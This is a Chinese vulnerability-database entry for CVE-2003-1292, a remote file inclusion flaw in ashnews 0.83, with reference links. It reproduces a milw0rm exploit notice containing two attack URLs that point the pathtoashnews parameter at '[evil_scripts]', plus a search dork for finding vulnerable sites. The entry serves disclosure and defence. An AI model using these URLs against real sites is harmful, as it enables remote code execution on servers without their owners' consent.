AshWebStudio AshNews远程文件列入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110382 漏洞类型 输入验证
发布时间 2006-06-02 更新时间 2006-06-15
CVE编号 CVE-2003-1292 CNNVD-ID CNNVD-200312-249
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1864
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-249
|漏洞详情
DerekAshauerashNews0.83版本存在PHP远程文件列入漏洞。远程攻击者借助(1)ashnews.php和(2)ashheadlines.php中pathtoashnews参数的URL执行任意远程文件。
|漏洞EXP
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
# Script site: http://dev.ashwebstudio.com/
# dork: News powered by ashnews
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]

http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-06-02]
|参考资料

来源:BID
名称:18248
链接:http://www.securityfocus.com/bid/18248
来源:BID
名称:16436
链接:http://www.securityfocus.com/bid/16436
来源:BUGTRAQ
名称:20030720sorry,wrongfile
链接:http://www.securityfocus.com/archive/1/329910
来源:MILW0RM
名称:1864
链接:http://www.milw0rm.com/exploits/1864
来源:SECUNIA
名称:9331
链接:http://secunia.com/advisories/9331
来源:forums.ashwebstudio.com
链接:http://forums.ashwebstudio.com/viewtopic.php?t=353&start=0
来源:FULLDISC
名称:20060131Re:ashnewsCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0980.html
来源:FULLDISC
名称:20060131Re:ashnewsCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0979.html
来源:FULLDISC
名称:20060130Re:ashnewsCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0969.html